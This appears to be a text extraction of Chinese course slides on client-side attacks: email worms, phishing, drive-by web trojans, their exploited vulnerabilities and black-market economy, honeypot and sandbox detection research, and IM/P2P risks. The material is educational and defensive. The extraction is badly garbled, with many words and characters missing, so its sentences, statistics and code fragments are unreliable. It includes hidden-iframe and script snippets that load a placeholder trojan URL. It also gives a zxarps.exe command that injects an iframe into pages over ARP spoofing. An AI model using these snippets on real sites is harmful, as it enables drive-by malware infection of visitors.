課程12.

客戶端

與防范技術(shù)諸葛zhugejianwe計算機

信安中心網(wǎng)絡(luò)攻防技術(shù)與實踐課程1網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛因特網(wǎng)客戶端因特網(wǎng)客戶端社會工程學(xué)因特網(wǎng)用戶

普通網(wǎng)民、安全意識薄弱:容易因特網(wǎng)客戶端代碼質(zhì)量較服務(wù)器端 差:

存在安全、IM…常用客戶端

:

瀏覽器、P2P網(wǎng)絡(luò)的興起改變了傳統(tǒng)的C/S(包括B/S)計算模式Peer:

集成了客戶端和服務(wù)器端的雙重角色P2P應(yīng)用:文件共享/網(wǎng)絡(luò)電視/IM(Skype)2網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛內(nèi)容1.網(wǎng)絡(luò)掛馬IM&P2P安全作業(yè)9：

掛馬案例分析3網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛互聯(lián)網(wǎng)最早期的應(yīng)用之一1969

or

1971

ARPANet遠(yuǎn)早于Web世界上第一封

？1969年10月：世界上的第一封電子郵件是由計算機科學(xué)家LeonardK.教授發(fā)給他的同事的一條簡短消息”LO”,

登錄

計算機1971年：RayTomlinson（MIT）SNDMSG程序第一封

郵件內(nèi)容?第二封

郵件：explaining

how

to

send

messagesover

the

network4網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛郵件&郵件郵件發(fā)送協(xié)議(SMTP)/接收協(xié)議(POP3)在設(shè)內(nèi)容計上沒有考慮安全性明文傳輸、明文口令Sniffer

并郵件(SPAM):

No

cost公開的

地址大量不請自來的郵件5網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛針對

客戶端安全

的客戶端存在安全Outlook/OE

vCard緩沖區(qū)溢出MS01-012MIME可執(zhí)行代碼MS01-020…可通過發(fā)送

構(gòu)造的進(jìn)行時被客戶端在接收或顯示郵件

/郵件蠕蟲6網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛郵件蠕蟲郵件蠕蟲通過借助于進(jìn)行

的網(wǎng)絡(luò)蠕蟲地址薄中的社會信任關(guān)系網(wǎng)應(yīng)用社會工程學(xué)或直接

客戶端著名案例Melissa“

”ILOVEYOU“愛蟲”…7網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛防范措施郵件使用安全郵件系統(tǒng)：Exchange,PGP等不用

發(fā)送敏感內(nèi)容，必要時，進(jìn)行加密傳輸郵件地址公開程度：

代替文本郵件過濾郵件安全

&補丁慎重對待

附件了解并戰(zhàn)勝社會工程學(xué)伎倆…8網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛內(nèi)容1.網(wǎng)絡(luò)掛馬IM&P2P安全作業(yè)9：

掛馬案例分析9網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛網(wǎng)絡(luò)

(Phishing)fishing

->

PhishingHacker

culture:

f

->

ph目標(biāo)：獲取個人敏感信息信息用戶名、口令、帳號ID、ATM

PIN碼或：架設(shè)

－目標(biāo)：知名金融機構(gòu)及商務(wù)發(fā)送大量

性

郵件誘騙因特網(wǎng)用戶

并以敏感信息登錄個人敏感信息

轉(zhuǎn)賬－經(jīng)濟利益，冒用

－

目的11網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛策略－架設(shè)大規(guī)模掃描有的主機并攻陷主機工具批掃描工具，自動架設(shè)：知名的金融機構(gòu)、電子商頁前臺務(wù)

組織性：集中服務(wù)器上存放多個目標(biāo)的面

：收集、驗證用戶輸入，并通過某種轉(zhuǎn)發(fā)給

者策略－

技術(shù)用戶DNSPharming

－網(wǎng)絡(luò)流量重定向(自動化)社會工程學(xué)－

性

郵件性

郵件發(fā)送途徑－難以追蹤

的開放郵件服務(wù)器，僵尸網(wǎng)絡(luò)發(fā)送源－冒充知名

機構(gòu)發(fā)送內(nèi)容－安全理由、緊急事件，

用戶魚

，給出敏感個人信息釣網(wǎng)絡(luò)

郵件示例標(biāo)題：中國工商銀行系統(tǒng)升級公告正文：尊敬的客戶，為了確保你的賬戶的正常使用，請及時升級您的個人網(wǎng)上銀行信息，否則您的賬戶將被終止。Phishing網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛14策略－的技巧使用IP地址代替發(fā)音相近或形似DNS:Unicode字符多數(shù)真實的

中混雜關(guān)鍵的指向網(wǎng)站的對

URL進(jìn)行編碼和瀏覽器，隱藏消息內(nèi)容的本質(zhì)的透明性安裝瀏覽器助手工具修改本地DNS

和IP地址

hosts文件蜜罐實際捕獲的Phishing案例數(shù)據(jù)德國案例英國案例被攻陷的蜜罐Redhat

Linux

7.1

x86.Redhat

Linux

7.3

x86.部署位置德國企業(yè)網(wǎng)絡(luò)英國ISP數(shù)據(jù)中心方法"Superwu"

autorooter.Mole

massscanner.被利用的Wu-Ftpd

File

globbing

heap

corruptionvulnerabilityNETBIOS

SMB

trans2open

buffer

overflow獲得的權(quán)限Root.Root.安裝的RootkitSimple

rootkits

that

backdoors

binaries.SHV4

rootkit可能的者未知來自羅馬尼亞的撥號IP網(wǎng)絡(luò)的多個組織行為多個構(gòu)建好的以eBay和多家銀行為目標(biāo)的一個預(yù)先構(gòu)建的以一家

主要銀行為目標(biāo)的服務(wù)器端處用于驗證用戶輸入的PHP擁有更高級用戶輸入驗證和數(shù)據(jù)分類的PHP理電子郵件活動企圖發(fā)送截.郵件,但被Honeywall所攔僅測試了郵件發(fā)送，可能是給

者同伙，Improved

syntax

and

presentation.電子郵件從一個中量級 地址輸入列表進(jìn)行郵件

的Basic

PHP

script從一個小量級的 地址輸入列表進(jìn)行垃圾郵件

的Basic

PHP

script

–

可能僅僅是一次測試.受害者是否到達(dá)沒有，

郵件的發(fā)送和對

的

被阻斷有，在4天內(nèi)有265個HTTP請求到達(dá)，但不是因為從服務(wù)器發(fā)出的

郵件所吸引的防范措施了解

安全

與技巧增強安全意識，提高警惕性或通過搜索引擎地球是個

的地方，要時刻保持警惕對郵件中包含的

，仔細(xì)核對登錄

、基金等關(guān)鍵

安全性：硬件U盾>軟，直接>口令不要相信“天上掉下來的餡餅”，提高對抗

能力

都存在社會工程學(xué)

的

，看誰更容易中招（普通攻擊者一般只針對更弱的受害者）。安全保障主機安全：補丁、反Web瀏覽安全/模塊：網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛/微軟/…17識別業(yè)界應(yīng)對趨勢APWGAnti-PhishingWork

Groups3000+

membersPhishing

DataRepository中國反部門國家金融業(yè)電子商務(wù)ISP、服務(wù)商網(wǎng)絡(luò)Copyright網(wǎng)絡(luò)攻防技術(shù)與實踐課程19內(nèi)容1.網(wǎng)絡(luò)掛馬IM&P2P安全作業(yè)9：

掛馬案例分析Copyright

(c)

2008－2009

諸葛網(wǎng)頁木馬Web-based

MalwareWeb

Infection

/Drive-by-downloads國內(nèi):

“網(wǎng)頁木馬”,

“網(wǎng)馬”Malicious

Website:

/掛馬網(wǎng)頁代碼形式控制隱藏寄生

:網(wǎng)絡(luò)

:

蠕蟲郵件

:

郵件:特洛伊木馬網(wǎng)頁

:

“網(wǎng)頁木馬”一對一控制:后門一對多控制:僵尸程序已成為國內(nèi)互聯(lián)網(wǎng)最重要的內(nèi)核隱藏:Rootkit應(yīng)用層隱藏DDoS :

DDoS

Agent信息竊取:Spyware點擊

:

ClickBot網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛網(wǎng)頁木馬在國內(nèi)的發(fā)展歷程萌芽期：200x-2003年代表“網(wǎng)馬”：

網(wǎng)馬等快速發(fā)展期：2004-2005年：大盜代表“網(wǎng)馬”：Icefox冰狐等；重要爆發(fā)期：2006-今：熊貓燒香代表“網(wǎng)馬”：MS06-014網(wǎng)馬,ANI網(wǎng)馬；重要對互聯(lián)網(wǎng)安全已構(gòu)成嚴(yán)重危害，工業(yè)界/學(xué)術(shù)圈關(guān)注“網(wǎng)頁木馬”成為最重要的

代碼

途徑之一時間名稱說明03.07網(wǎng)馬MS03-014國內(nèi)最早出現(xiàn)并流行的網(wǎng)馬之一04.09IceFoxMS04-040國內(nèi)知名且廣泛使用的網(wǎng)馬04.11大盜MS04-040通過網(wǎng)馬植入 木馬,獲利38萬,主犯被06.0706014網(wǎng)馬MS06-0142006年國內(nèi)最流行的網(wǎng)馬07.02熊貓燒香MS06-014,共享/U盤2007年國內(nèi)最重要的網(wǎng)絡(luò)

,獲利24萬,主犯被

4年有期07.03ANI網(wǎng)馬MS07-0172007年國內(nèi)流行的網(wǎng)馬網(wǎng)頁木馬所利用的安全2003:

MS03-0142004:

MS04-023/028/038/040/044/0452005:

MS05-002/016/020/026/0382006:

MS06-001/006/014/024/042/044/046/057/067/Quick

Time/WinZip2007:

MS07-004/009/017/020/027/033/035/045/047/055雅虎通

/迅雷ActiveX/聯(lián)眾網(wǎng)頁木馬利用安全搜霸/PPStream/暴風(fēng)影音/雅虎通CYFT/Web迅雷//超星/迅雷5－迅雷看看/RealPlayer/McAfee的趨勢：數(shù)量呈現(xiàn)快速增長趨勢網(wǎng)頁木馬所利用的安全“

”越來越關(guān)注和利用常見應(yīng)用中存在的安全

“”利用安全

構(gòu)建網(wǎng)頁木馬的所需時間越來越短年份系統(tǒng)層安全應(yīng)用層安全總計2003101200460620055052006921120071012222008年主流的網(wǎng)頁木馬–Top10網(wǎng)絡(luò)攻防技術(shù)與實踐課程23Windows

XP

MDAC

RDS.Dataspace

ActiveX控件SP2/Server

2003Exploit.Ms06014MS06014代碼執(zhí)行SP1/2000

SP453721.86%RealPlayer

ierpplug.dll

ActiveX控件Real

NetworksRealPlayer

11

Beta/10.5/10Exploit.RealPlayer.ImportCVE-2007-5601列表名稱棧溢出2007-10-1832613.27%RealNetworks

RealPlayer

rmoc3260.dllReal

NetworksRealPlayer11.0.1Exploit.RealPlayer.ConsoleActiveX控件內(nèi)存破壞(build

94)2008-3-102389.69%Adobe

Flash

Player

版本修改多個Adobe

Flash

PlayerExploit.Flash.Gen?CVE-2007-5275等安全<2008-4-82158.75%Exploit.LZ.IEStartNative聯(lián)眾世界GLIEDown2.dll

Active控件多個溢出GlobalLinkbeta/92008-5-71827.41%Exploit.Uusee.UpdateUUSee網(wǎng)絡(luò)電視2008

UUUpgrade

ActiveX控件Update方式任意文件UUSee網(wǎng)絡(luò)電視20082008-6-261114.52%Adobe

Flash

Player

SWF文件DeclareFunction2

ActionScript 堆溢出Adobe

FlashPlayer<2008-4-8Exploit.Flash.SwfCVE-2007-6019953.87%Exploit.BaoFeng2.MutiCVE-2007-4816暴風(fēng)影音2mps.dll組件多個緩沖區(qū)溢出BaoFeng暴風(fēng)影音2.9/2.82007-9-7893.62%超級搜霸BaiduBar.dll

ActiveX控件Exploit.Baidu.dloadds

代碼執(zhí)行 搜霸5.4 2007-7-19

51

2.08%PPStreamPPStream

PowerPlayer.DLL

ActiveX控件緩沖PowerPlayerActiveXExploit.PPStream.Logo

CVE-2007-4748 區(qū)溢出 Control

829 2007-8-19

19

0.77%Copyright

(c)

2008－2009

諸葛2020年1典型網(wǎng)頁木馬-MS06-014網(wǎng)馬MS06-014安全

機理MDAC中的RDS.DataspaceActiveX控件

代碼執(zhí)行，沒有對通過該控件在宿主上的交互行為進(jìn)行有效控制MS06-014網(wǎng)馬程序Copyright

(c)

2008－2009

諸葛典型網(wǎng)頁木馬

-

ANI網(wǎng)馬機理MS07-01Window方式中存可構(gòu)建惡ANI網(wǎng)馬MS07-017網(wǎng)馬利用追蹤結(jié)果環(huán)節(jié)事件作者/單位時間點信息發(fā)布源安全和發(fā)現(xiàn)安全通知廠商發(fā)現(xiàn)并AlexanderSotirov/Determina06/12/20"黑帽子"開始利用不詳07/3/27前因特網(wǎng)上出現(xiàn)Exploit-ANIfile.c公開披漏首次公開披漏McAfeeAverts

Labs07/3/28<http:/

/research/blog/?p=230>BugTraq郵件列表信息公開披漏AlexanderSotirov

/Determina07/3/30<

/archive/1/archive/1/

464269/100/0/threaded>程序出現(xiàn)國內(nèi)網(wǎng)頁木馬出現(xiàn)逐

浪MSDN[C.B.H.U]07/3/30<h

/read.php?tid-3014.html>廠商發(fā)布安全警告及補丁程序廠商發(fā)布安全警告07/3/31<http:/y/935423.mspx>/technet/security/advisor廠商發(fā)布補丁程序07/4/3<http:/n/MS07-017.mspx>/technet/security/Bulleti程序大規(guī)模 和危害因特網(wǎng)光標(biāo)

掛馬在國內(nèi)大規(guī)模流行07/4<h3befbaf51339f.html>/daishuo/blog/item/6bebce1b14e交易光標(biāo)

網(wǎng)馬開始黑市交易，9907/4/15<htt

/f?ct=335675392&tn=baiduPostBrowser&sc=1783269275&z=191313751&pn=0&rn=50&lm=0&word=%CD%F8%C2%ED#1783269275>網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛262020年1網(wǎng)馬網(wǎng)絡(luò)流量重定向機制內(nèi)嵌HTML最為簡單和常見的流量重定向機制：iframe嵌入外部頁面<iframe

src="URL

to

Trojan"

width="0"

height="0"frameborder="0">

</iframe>frame,

body

onload事件,

CSS

等script包含網(wǎng)頁木馬很常見：利用script

通過跨站<scriptlanguage=Javascript>

.write("<iframewidth=1

height=1

src=URL

to

Trojan></iframe>");</script>window.open("URLto

Trojan")內(nèi)嵌對象調(diào)用第

應(yīng)用

或瀏覽器幫助對象（BHO）的內(nèi)嵌對象Adobe

Pdf

/

Flash28網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛網(wǎng)頁木馬“

鏈”網(wǎng)頁木馬通常不會直接存在于被掛馬頁面中通過多層嵌套的內(nèi)嵌

、跨站

等方式構(gòu)建網(wǎng)馬“鏈”便于通過者管理和統(tǒng)計加大防御者分析難度

：需要在網(wǎng)頁動態(tài)視圖樹中對網(wǎng)馬進(jìn)行檢測和首頁Frame框架BannerWeb惡意代碼framescriptiframescriptscriptiframe流量統(tǒng)計點擊流量統(tǒng)計代碼29網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛網(wǎng)頁木馬鏈?zhǔn)纠粧祚R

:網(wǎng)頁木馬宿主:aa.[xxxx].netindex.htmlcommon.js[protal].html[dispatcher].htmMS06-014網(wǎng)馬搜霸網(wǎng)馬PPS網(wǎng)馬木馬宿主:down.[xxxx].net器木馬30網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛一個實際的網(wǎng)頁掛馬案例31網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛一個實際的網(wǎng)頁掛馬案例樣本重放32網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛ARPARP重定向技術(shù)，一種中間人A

B網(wǎng)關(guān)B打開IP轉(zhuǎn)發(fā)功能B廣播

的ARP包,聲稱自己是網(wǎng)關(guān)的IP地址A給外部發(fā)送數(shù)據(jù)，首先發(fā)給BB再轉(zhuǎn)發(fā)給真正的網(wǎng)關(guān)做法：利用dsniff中的arpredirect工具33網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛ARP掛馬ARP

掛馬:危害度更高的掛馬網(wǎng)絡(luò)構(gòu)建策略并不需要真正攻陷目標(biāo)

：知名

通常防護(hù)嚴(yán)密ARP

掛馬:在Web請求反饋頁面中

iframe等重定向代碼，從而使得目標(biāo)服務(wù)器端ARP被“虛擬”掛馬掛馬，進(jìn)行ARP

掛馬同一以太網(wǎng)中獲得雖未被攻陷，但所有者網(wǎng)頁木馬的,12月1x號就業(yè)在目標(biāo)目標(biāo)案例：07年10月份EST

Nod32中國信息網(wǎng)…防護(hù)措施：MAC地址綁定客戶端同一網(wǎng)段內(nèi)

指定或任意

都 入iframe等掛馬防護(hù):

ARP

zxarps.exe

-idx

0

-ip

3

-port

80-hacksite-insert

"<iframewidth=0

height=0></iframe>"/xx.htm34網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛國外相關(guān)研究工作最早研究工作-NDSS’06AutomatedWWeb

Sites

Thatrol

with

Strider

HoneyMonkeys:

Findingploit

Browser

Vulnerabilities,

MS

Research網(wǎng)頁的方法，以及所利用的漏提出使用客戶端蜜罐技術(shù)動態(tài)檢測主要目標(biāo)：發(fā)現(xiàn)

瀏覽器的洞A

Crawler-based

Study

of

Spyware

on

the

Web,

UW中提供

的

,

以及Drive-by-同時分析downloads基于反引擎的檢測方法TheHoneynetProjectKnow

Your

Enemy:

Malicious

Web

Servers,

2007.Know

Your

Enemy:

Behind

the

Scenes

of

Malicious

WebServers,

2007.第35頁站點安全性等多種因素進(jìn)行站點安全性評SiteAdvisor:

MIT→McAfee綜合

文件安全性/測提供IE/Firefox插件,給出搜索引擎(/Baidu/Yahoo!)查詢結(jié)果和客戶

站點的安全性建議+

Stopbadware@Harvard“SafeBrowsing”ProjectThe

GhostIn

TheBrowser, ysis

of

Web-basedMalware.HotBots’07.結(jié)合啟發(fā)式靜態(tài)分析和虛擬機動態(tài)檢測方法給出了豐富的統(tǒng)計數(shù)據(jù)All

Your

iFRAMEs

Point

to

Us. TR,2008.,9K宿主站Machine

Learning

Scoring

→

VM

VerificationBillions

URLs

→60M可疑URL→3M

網(wǎng)頁,

181K點64.6%

和67%宿主站點屬于中國

網(wǎng)Reinterpreting

the

Disclosure

Debate

for

Web

Infections.

WEIS’08.國外相關(guān)研究工作(2)第36頁SiteAdvisor網(wǎng)絡(luò)攻防技術(shù)與實踐課程37Copyright

(c)

2008－2009

諸葛SafeBrowsing網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛38國內(nèi)相關(guān)工作→提取

→檢測程序理工大學(xué)北理工

與對抗2005年242項目:網(wǎng)頁木馬搜索檢測系統(tǒng)2007年242項目:

掛馬

分析與處置支撐基于靜態(tài)分析檢測技術(shù)路線

搜索頁面→查找可疑代碼→→追蹤木馬來源需應(yīng)對網(wǎng)頁木馬編碼和加密問題性能指標(biāo):準(zhǔn)確率80%,

檢測性能30萬URL/天工業(yè)界工業(yè)界:

瑞星/ /奇虎360/反搜索引擎: /微軟尚未提供搜索結(jié)果安全性保障機制第39頁網(wǎng)頁木馬檢測技術(shù)及發(fā)展趨勢網(wǎng)頁木馬檢測技術(shù)發(fā)展趨勢結(jié)合多種檢測技術(shù)，優(yōu)勢互補高速并行化處理能力：提供全網(wǎng)范圍的監(jiān)測能力

對

、

部門，搜索引擎服務(wù)提供商均具有重要應(yīng)用價值網(wǎng)關(guān)、客戶端的網(wǎng)頁木馬檢測技術(shù)研究工作檢測技術(shù)誤報率漏報率性能實現(xiàn)難度UW,基于反

引擎低高較差低MS,THP,動態(tài)行為分析低較高差較高BIT,網(wǎng)頁靜態(tài)分析較高較高好高第40頁關(guān)于網(wǎng)頁木馬的研究工作經(jīng)濟鏈的監(jiān)測研究中國

網(wǎng)上網(wǎng)頁木馬和研究網(wǎng)危害尤為突出實際應(yīng)用需求:國家科研已成為互聯(lián)網(wǎng)嚴(yán)重的安全

，針對網(wǎng)頁木馬的監(jiān)測技術(shù)具有項目、工業(yè)界合作機會驅(qū)動經(jīng)濟鏈、創(chuàng)新性的監(jiān)測技術(shù)研究具有一定學(xué)術(shù)價值課題資助242計劃2007G23重要內(nèi)容–網(wǎng)頁木馬監(jiān)測技術(shù)進(jìn)一步資助：發(fā)改委

專項研究內(nèi)容分析網(wǎng)頁木馬背后驅(qū)動的

經(jīng)濟鏈網(wǎng)頁木馬安全

機理研究網(wǎng)頁木馬監(jiān)測技術(shù)研究第41頁網(wǎng)頁木馬背后驅(qū)動的分析經(jīng)濟鏈經(jīng)濟鏈網(wǎng)頁木馬背后驅(qū)動的最重要的支柱:網(wǎng)絡(luò)虛擬資產(chǎn)地下經(jīng)濟鏈其他:點擊網(wǎng)絡(luò)虛擬資產(chǎn)/DDoS等經(jīng)濟鏈角色:

編寫者,

黑站長/駭客,

“信封”

者,

虛擬資產(chǎn)者,

虛擬資產(chǎn)賣家,

玩家經(jīng)濟鏈交互市場布黑市：

貼吧等，

即時通訊發(fā)溝通，支付寶交易虛擬資產(chǎn)公開市場：淘寶、騰訊拍拍網(wǎng)等第42頁對經(jīng)濟鏈黑市的監(jiān)測分析監(jiān)測目標(biāo):

貼吧中的“黑市”貼吧木馬、網(wǎng)頁木馬、網(wǎng)馬、信封、流量、…2006年至2007年發(fā)布的

黑市

信息監(jiān)測與統(tǒng)計分析信息23,606個不同的59.5%信息中包含發(fā)布者,90,670不同碼→主要聯(lián)絡(luò)方式43第44頁對網(wǎng)絡(luò)虛擬資產(chǎn)交易的監(jiān)測分析監(jiān)測目標(biāo)：淘寶網(wǎng)上的網(wǎng)絡(luò)虛擬資產(chǎn)數(shù)據(jù)來源：淘寶網(wǎng) 的歷史交易信用記錄（6個月內(nèi)）利用爬 技術(shù)獲取這些頁面 并提取交易信監(jiān)測與統(tǒng)6個月了國內(nèi)對黑相當(dāng)網(wǎng)絡(luò)虛與廣體現(xiàn)聯(lián)性網(wǎng)頁木馬總體技術(shù)流程第45頁網(wǎng)頁木馬檢測技術(shù)研究研究目標(biāo)快速檢測:高性能精確檢測:低誤報率、低漏報率深入追蹤:支持應(yīng)急處置、案例和態(tài)勢分析檢測技術(shù)研究網(wǎng)頁木馬動態(tài)檢測技術(shù)檢測頁面

被掛接網(wǎng)頁木馬木馬網(wǎng)絡(luò)(Malware

Distribution

Network)追蹤技術(shù)深入追蹤整個木馬網(wǎng)絡(luò)，定位木馬宿主站點，獲取樣本基于

引擎的網(wǎng)頁木馬檢測技術(shù)對抗“免殺”頁面

機制精確檢測網(wǎng)頁木馬類型第46頁網(wǎng)頁木馬動態(tài)檢測技術(shù)基于高交互式客戶端蜜罐技術(shù)構(gòu)建檢測環(huán)境最普遍的客戶端環(huán)境:WindowsXPSP2+IE6+常用的應(yīng)用利用虛擬機

VMware的快速恢復(fù)機制使用客戶端蜜罐環(huán)境

待驗證網(wǎng)頁，根據(jù)蜜罐系統(tǒng)上的動態(tài)行為確認(rèn)是否包含網(wǎng)頁木馬動態(tài)行為分析技術(shù)代碼自動分析平臺242項目研究成果MwSniffer:

基于API調(diào)用劫持的

行為輕量級沙箱技術(shù)(FVM

Sandbox)物理主機上的進(jìn)程級輕量級虛擬機支持

受控環(huán)境下的多進(jìn)程并發(fā)執(zhí)行與動態(tài)分析能夠大幅提高動態(tài)行為分析性能網(wǎng)頁木馬動態(tài)檢測系統(tǒng)運行界面輕量級沙箱技術(shù)研發(fā)Windows

kernel宿主進(jìn)程宿主進(jìn)程動態(tài)分析控制進(jìn)程進(jìn)程FVM

1userkernelFVM

輕量級沙箱虛擬層API系統(tǒng)調(diào)用接口進(jìn)程FVM

2技術(shù)難點如何實現(xiàn)資源

，保證宿主安全如何實現(xiàn)分析環(huán)境的快速恢復(fù)如何實現(xiàn)并發(fā)分析，并降低對系統(tǒng)資源的需求并行分析時如何區(qū)分各個沙箱中不同進(jìn)程的行為如何降低沙箱的可檢測性輕量級沙箱技術(shù)方案基于Windows操作系統(tǒng)（提供樣本運行環(huán)境）使用名字空間重定向技術(shù)實現(xiàn)資源隔離、可并發(fā)化、沙箱的透明化及分析環(huán)境的可恢復(fù)性COW

(Copy

on

Write)技術(shù)保證輕量化基于內(nèi)核層的SSDTHooking技術(shù)實現(xiàn)進(jìn)程動態(tài)行為的分析和控制第49頁第50頁木馬網(wǎng)絡(luò)追蹤技術(shù)目標(biāo)深入追蹤和獲取已確認(rèn)網(wǎng)頁木馬案例的相關(guān)信息，支持應(yīng)急響應(yīng)、案例、站點安全性評估等實際應(yīng)用木馬網(wǎng)絡(luò)追蹤技術(shù)MwHunter:

網(wǎng)頁木馬追蹤和木馬網(wǎng)絡(luò)每個節(jié)點采用瀏覽器BHO方式遞歸精確精確定位網(wǎng)頁木馬

、木馬宿主站點結(jié)合

查詢、地理信息查詢獲取宿主站點MwFetcher:

網(wǎng)頁木馬、植入

代碼者信息系統(tǒng)基于引擎的網(wǎng)頁木馬檢測技術(shù)基于Javascript

引擎對抗并檢測網(wǎng)馬引擎:SpiderMonkeyDOM模擬機制:

為

引擎執(zhí)行JS代碼提供支持基于頁面動態(tài)視圖的檢測機制基于

本質(zhì)特征的插件

模擬與檢測技術(shù)S

code及Heapspray探測技術(shù)被AsiaCCS’10,VARA’09錄用處于研究階段，尚未達(dá)到工程化應(yīng)用成熟度參與The

Honeynet

Project開源工具PHoneyC研發(fā)改進(jìn)

Summer

of

Code

2009計劃，3個學(xué)生成功申請并完成51第52頁采樣監(jiān)測方法搜索引熱榜：200最常使用搜索關(guān)鍵字12個站點類別Baidu&擎144K采樣站點采樣監(jiān)測結(jié)果2,149(1.49%)站點包含網(wǎng)頁木馬資源

/運動

/影視類包含網(wǎng)頁木馬比例更大，更反

的檢測率不足以有效防護(hù)52中國

網(wǎng)上網(wǎng)頁木馬的監(jiān)測實驗第53頁進(jìn)一步追蹤木馬網(wǎng)絡(luò)木馬網(wǎng)絡(luò)追蹤結(jié)果發(fā)現(xiàn)327個木馬宿主站點通過

分析構(gòu)建了龐大的木馬網(wǎng)絡(luò)圖影響范圍最廣的木馬宿主-18涉及131個頂級

，植入20多網(wǎng)游

木反映虛擬資產(chǎn)

經(jīng)濟鏈的典型掛馬網(wǎng)絡(luò)案前10活躍宿主涉及掛馬的頂級

數(shù)量131rb.vg5438073423馬22oo.vg191918on16由經(jīng)濟鏈驅(qū)動的典型掛馬

案例木馬網(wǎng)絡(luò)構(gòu)建者－擁有豐富經(jīng)驗的“信封”網(wǎng)頁木馬/

木馬－從經(jīng)濟鏈中者或團隊編寫者網(wǎng)頁木馬：MS06-014,

暴風(fēng)影音,

PPStream,

搜霸器:

用于獲取長期控制權(quán)，并植入

木馬木馬：1-20.exe，網(wǎng)游

木馬，竊取“信封”發(fā)送至“箱子”頁面使用了一系列編碼、加密、加殼免殺機制躲過反

加大分析難度流量－涉及131個頂級

，從黑站長/“黑站”者手中“信封”

－“信封”竊取者從“箱子”獲得的收獲，出售給網(wǎng)絡(luò)虛擬資產(chǎn)“

者”進(jìn)行

牟利18木馬網(wǎng)絡(luò)案例研究55M工程-掛馬監(jiān)測系統(tǒng)蜜罐技術(shù)Matrix中國分部式蜜網(wǎng)863-Honeyfarm-07輕量級沙箱技術(shù)隱蔽性

檢測115-Rootkit-06代碼自動分析242-Malware-06M工程國家發(fā)改委專項掛馬采樣監(jiān)測經(jīng)濟鏈242-Hacker-07程序結(jié)構(gòu)模式分析脆弱性分析疑似路徑提取安全

挖掘技術(shù)863-VUL-07隱蔽信道挖掘天網(wǎng)爬蟲僵尸網(wǎng)絡(luò)追蹤

242-BotNet-05242-BotNet-07當(dāng)前實際運行的掛馬監(jiān)測系統(tǒng)*.*.0.0/16文件服務(wù)器/管理服務(wù)工作數(shù)據(jù)庫URL集群預(yù)處理集群掛馬檢測集群掛馬分析集群辦公網(wǎng)網(wǎng)口2*.*.0.1網(wǎng)口1*.*.40.0網(wǎng)口4多條寬帶接入2009年9月份的采樣監(jiān)測結(jié)果完成對教育網(wǎng)的的監(jiān)測發(fā)現(xiàn)掛馬個高校的數(shù)量個被掛馬個(3.15%)完成對10859多個

的監(jiān)測發(fā)現(xiàn)106個單位的112個站點被掛馬(1.03%)完成對1097個科研系統(tǒng)

的監(jiān)測發(fā)現(xiàn)22個單位的27個站點被掛馬(2.46%)網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛57教育網(wǎng)上監(jiān)測到的高校掛馬9月份采樣檢測完整列表高校掛馬站點數(shù)高校掛馬站點數(shù)16658某大學(xué)掛馬案例被掛馬

：http

/2007/web/htm/gdxfjjx/index.html掛馬結(jié)果：通過多個 進(jìn)行

,植入木馬 程序orz.exe59向掛馬寄送的掛馬事件通知應(yīng)對掛馬案例-事件通知ERCIS

→計算中心61應(yīng)對掛馬案例-事件處置?計算中心→處置→計算中心→ERCIS掛馬防范措施補丁系統(tǒng)

補丁自動更新經(jīng)常升級應(yīng)用反瀏覽器使用IE,

Firefox非主流

:

Chrome,

Opera上網(wǎng)沖浪方式安全建議SiteAdvisor…63網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛內(nèi)容1.網(wǎng)絡(luò)掛馬IM&P2P安全作業(yè)9：

掛馬案例分析64網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛IM&P2P新形態(tài)的因特網(wǎng)應(yīng)用IM-即時通信MSN/

/SkypeP2P/BT/…PPLive/PPStream/…P2SP:

迅雷…者也在追逐熱點和新潮65網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

諸葛IM即時通訊中的Phishing2020年11月166踐課程Copyright

(c)

2008－2009

諸葛P2P安全在P2P網(wǎng)絡(luò)中放置內(nèi)容事件WWW上遭到

，但P2P仍可與壓縮成壓縮包供人

，順便把用戶運行壓縮包里的文件后一起打包，把

直接改成

的格式，誘騙上當(dāng)通過P2P網(wǎng)絡(luò)的泄密事件Winny

P2P

造成自衛(wèi)隊、泄漏涉密內(nèi)容控制不嚴(yán)格，進(jìn)

網(wǎng)非涉密計算機Winny

文件中

“Antinny”Antinny

將個人文件通過P2P網(wǎng)絡(luò)共享，被搜索竊取67網(wǎng)絡(luò)攻防技術(shù)與實踐課程Copyright

(c)

2008－2009

